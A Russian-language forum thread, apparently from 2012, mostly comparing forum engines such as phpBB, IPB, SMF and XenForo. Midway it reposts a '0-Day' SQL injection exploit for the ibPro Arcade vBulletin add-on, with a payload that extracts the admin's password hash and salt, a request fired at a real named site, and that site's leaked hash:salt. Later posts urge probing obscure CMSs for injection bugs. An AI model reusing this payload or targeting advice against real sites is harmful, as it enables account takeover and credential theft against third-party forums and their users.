Не могу найти полной информации по настройке.
Спасибо заранее!
Не могу найти полной информации по настройке.
Спасибо заранее!
Last edited by whiteshuk; 03-07-2012 at 07:37.
Linux version 2.6.32-40-generic (buildd@yellow) (gcc version 4.4.3 (Ubuntu 4.4.3-4ubuntu5) ) #87-Ubuntu SMP Tue Mar 6 00:56:56 UTC 2012
Успех – это путь от провала до провала без потери энтузиазма. (В. Черчиль)
Не бойся идти медленно, бойся остановиться. (Китайская пословица)
When you lose fun and start doing things only for the payback, you're dead. (c) TCLH (Phrack 65, Intro)
whiteshuk (05-07-2012)
phpbb3 довольно сложный в плане настроек прав, сам запарился, а ещё довольно уязвимый, да и нагрузки большие он не держит, видел у китайцев довольно популярны phpwind и discuz, тянут очень нагруженные проекты на ура, из наших могу сказать что вобла 3.x довольна стабильна и безопасна, только с костылями. XenForo и Smf, тоже довольно лёгкие и шустро справляются с нагрузками, вот IPB мертвый слон...
Реверсинг ПО для незрячих - благородная цель
whiteshuk (05-07-2012)
Не сложный, а много функциональный. Что соответственно требует немного больше времени для изучения.phpbb3 довольно сложный в плане настроек прав, сам запарился
Форум от создателей воблы (vbulletin 3.x). Внешне довольно симпатичный. Функционал не крутил.XenForo
Недавно смотрел, очень не понравился. В плане функциональности чувствуешь себя ущербным. Я бы охарактеризовал его "Огрызок", сугубо мое ИМХО.Smf
То что нет русской поддержки, совершенно не значит, что это мертвый форум. Очень хороший, постоянно развивающийся форум, с поддержкой полезных плюшек (правда за дополнительную плату).IPB мертвый слон
PS: Если бы я сейчас стоял перед выбором vBulletin или IPB, то наверное выбрал бы IPB.
Успех – это путь от провала до провала без потери энтузиазма. (В. Черчиль)
Не бойся идти медленно, бойся остановиться. (Китайская пословица)
When you lose fun and start doing things only for the payback, you're dead. (c) TCLH (Phrack 65, Intro)
IPB из коробки даже тормозит на слабых машинах, сильно требователен к оперативе
база данных 130+ таблиц, ещё и языковые строки в ней хранится
раньше уважал IPB2 но с выходом 3йки понял что они оборзели, даже отключив совершенно все рюшечки открытие страниц на локалке 1-2 секунды,
по поводу smf он немного ограничен, создавался как "домашний форум", однако держит базы данных от 500 метров на ура!
phpbb по сравнению с тем же xenforo слишком уж редко обновляется и уже потерял свою популярность из-за застывшего девелопинга.
Last edited by V3T; 04-07-2012 at 11:10.
Реверсинг ПО для незрячих - благородная цель
Для комфортного старта подойдут средние тарифы большинства хостеров. Затем, при повышении аудитории, можно переходить до максимального. Благо, хостинг сейчас дешевый.IPB из коробки даже тормозит на слабых машинах, сильно требователен к оперативе!
база данных 130+ таблиц, ещё и языковые строки в ней хранится!
Успех – это путь от провала до провала без потери энтузиазма. (В. Черчиль)
Не бойся идти медленно, бойся остановиться. (Китайская пословица)
When you lose fun and start doing things only for the payback, you're dead. (c) TCLH (Phrack 65, Intro)
кстате вот событие по поводу воблы: Странно, что vbsupport на этот раз не сделали рассылки об уязвимости,
Уязвимость в хаке ibPro Arcade
[0-Day] ibPro Arcade vBulletin Exploit
Fetch the password & salt of user ID 1:Code:/arcade.php?act=Arcade&do=stats&comment=a&s_id=[SQLi]
proof:Code:/arcade.php?act=Arcade&do=stats&comment=a&s_id=1 AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT CONCAT(password,0x3a,salt) FROM user WHERE id = 1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Code:http://www.nohomers.net/arcade.php?act=Arcade&do=stats&comment=a&s_id=1%20AND%20(SELECT%201%20FROM%20(SELECT%20COUNT(*),CONCAT((SELECT%20CONCAT(password,0x3a,salt)%20FROM%20user%20WHERE%20id%20=%201),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)Code:mySQL error: Duplicate entry '7a4d3244d834397e38b65ef817e62cb4:Q:v)r!oe@KuF:L5@aA91^qyiaTOsC%1' for key 'group_key'
Те, у кого установлен данный хак - снесите, fix'a устраняющего уязвимость пока нет тема на vbulletin.org
http://www.vbulletin.org/forum/showthread.php?t=101554
Сейчас начался повальный взлом форумов, недавно был взломан bormotuhi.нет,
всего сайтов использующих этот хак приблизительно >400 000
https://www.google.ru/search?sugexp=...d+by+vBulletin
Гугл находит 233 000
Реверсинг ПО для незрячих - благородная цель
Linux version 2.6.32-40-generic (buildd@yellow) (gcc version 4.4.3 (Ubuntu 4.4.3-4ubuntu5) ) #87-Ubuntu SMP Tue Mar 6 00:56:56 UTC 2012
whiteshuk: да мне ребята накидали тут интересных ресов, вот и нахожу:)
у гугла есть вообще много интересных правил поиска, вот немного: http://jbhelp.ru/topic/156-google-hacks/
Реверсинг ПО для незрячих - благородная цель
whiteshuk (05-07-2012)
Ладно, надеюсь никто не обидется.
Я так понимаю это заплатка? http://forum.reverse4you.org/index.p...20group_concat
Раньше там была уязвимость, или как?
Linux version 2.6.32-40-generic (buildd@yellow) (gcc version 4.4.3 (Ubuntu 4.4.3-4ubuntu5) ) #87-Ubuntu SMP Tue Mar 6 00:56:56 UTC 2012
Никакой уязвимости там нет и не было. Это срабатывает небольшой фильтр.Ладно, надеюсь никто не обидется.
Я так понимаю это заплатка? http://forum.reverse4you.org/index.p...20group_concat
Раньше там была уязвимость, или как?
Успех – это путь от провала до провала без потери энтузиазма. (В. Черчиль)
Не бойся идти медленно, бойся остановиться. (Китайская пословица)
When you lose fun and start doing things only for the payback, you're dead. (c) TCLH (Phrack 65, Intro)
простая проверка на get параметры, не думаю что тут какието самодельные костыли есть, все исправления уязвимостей есть в паблике...
думаю если и искать баги, то не в стандартных файлах воблы, она вся давно леченная перелеченная. вон блог поковыряй может чего и найдется...
хотя не знаю какая квалификация в сфере php у рута, может он маньяк вообще))
часто разрабы модов забывают добавлять банальные проверки на размер полей, а в мускуле если будет переполнение поля будет выдаваться ошибочка которую можно потом раскрутить...
Last edited by V3T; 05-07-2012 at 19:53.
Реверсинг ПО для незрячих - благородная цель
я не силён в построении инъекций... по форумам там до сям читаю...
Реверсинг ПО для незрячих - благородная цель
Может попробуем тогда все это как-то систематизировать?
Linux version 2.6.32-40-generic (buildd@yellow) (gcc version 4.4.3 (Ubuntu 4.4.3-4ubuntu5) ) #87-Ubuntu SMP Tue Mar 6 00:56:56 UTC 2012
что значит систематизировать? - это и есть програмирование, изучай мускул, php, node, ruby
только знающий как это работает сможет найти ошибку в работе другого,
мой совет - ковыряй малоизвестные cms...
Реверсинг ПО для незрячих - благородная цель